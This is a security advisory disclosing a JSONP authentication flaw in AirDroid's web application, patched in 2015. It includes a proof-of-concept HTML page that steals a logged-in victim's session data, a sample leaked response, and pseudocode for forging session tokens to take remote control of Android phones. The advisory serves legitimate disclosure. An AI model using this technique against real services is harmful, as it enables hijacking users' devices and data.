AirDroid Web Application Authentication Flaw

Gauge showing high severity reading

Share

Release Date

April 15, 2015

Patch Date

March 2015

Reported Date

February 27, 2015 – Submitted to AirDroid

Vendor

AirDroid/Sand Studio/TongBu Networks

Systems Affected

None. Vulnerability patched as of March 2015.

Summary

AirDroid Version 3.0.4 and earlier versions' web applications use JSON with padding (JSONP) for performing cross-origin requests. Due to JSONP being an insecure method of sharing data across origins, it is possible to hijack all of the AirDroid application functionality. By doing this, other users’ Android devices can be hijacked.

Vendor Status

AirDroid has been made aware of the issue and has pushed a patch to the web interface.

Exploit Availability

We created an exploit to demonstrate the severity of this particular vulnerability. It works as follows:

1. Construct a malicious page that sources the following JSONP endpoint:

<!DOCTYPE html>

<body>

<script>

function _callhack( stolen_data ) {

       alert( JSON.stringify( stolen_data ) );

}

</script>

<script src="https://id.airdroid.com/p9/user/signIn.html?callback=_callhack"></script></body>

2. Lure an authenticated AirDroid user to the malicious page created in 1. This will result in the sourcing of the JSONP endpoint above, using the victim user’s active AirDroid web session, and the response will contain the information needed to generate a valid 7bb session token. A sample response is given below:

_callhack({"code":"1","result":{"id":"2960728","nickname":"mandatory","mail":"mandatory@[REDACTED]","create_date":"2013-11-27 03:01:58","data_flow_total":"0","vip":"0","vip_starttime":null,"vip_endtime":null,"from_type":"","read_new":"1","mail_verify":"1","pay_type":"0","isPremium":-1,"has_device":"1","device":[{"id":"2800627","name":"","deviceId":"182bed78cde24b3aa9458b[REDACTED]","channelToken":"ae089b0a0a0d[REDACTED]","logicKey":"7530f7bd7149c7c57a5[REDACTED]","manu":"samsung","model":"SM-N900V","model_pic":"http://img.airdroid.com/devices//samsung/Samsung Note 3","osVersion":"4.3","sdkApiLevel":"18","netOpts":{"ip":"[REDACTED]","port":8888,"socket_port":8889,"ssl_port":8890,"usewifi":"true"},"appVer":"67","is_default":"0","imsi":"311480[REDACTED]","create_date":"2014-08-23 22:37:18"}],"app_last_modify":"1415991234"},"msg":"success!"})

3. Using the above information, a valid 7bb session token can be generated. The follow pseudocode shows the process for creating said token:

bb = UNIX_TIMESTAMP + md5(UNIX_TIMESTAMP + DEVICE_ID + LOGIC_KEY)

Vulnerability Details

This authentication flaw allows remote control of other users’ Android phones.
SMS: send and receive individual or group messages.
Apps: Import and export .apk files.
Files: Manage files on Android and transferring files between Android and computer.
Photos: View and manage photos on Android and transferring photos between Android and computer.
Music & Videos: Play and manage music & videos on Android and transferring them between Android and computer.
Ringtones: Set music as ringtone and export any ringtone.
Contacts: View and edit all the contacts.
Screenshot: View the real-time screen of Android devices, take static screenshots. (root required)
Camera: See through the lens of both front and back camera, also supports flashlight.
URL: Push URL to Android and open automatically open it with Android browser.
Clipboard: Share clipboard content between Android and computer.
GPS: Track the mobile device’s location.

Researcher

Matt Bryant of Bishop Fox

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.


Default fox headshot blue

About the author, Matt Bryant

Bishop Fox Alumnus

Matt Bryant is a security researcher. He was formerly a consultant at Bishop Fox.

More by Matt

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.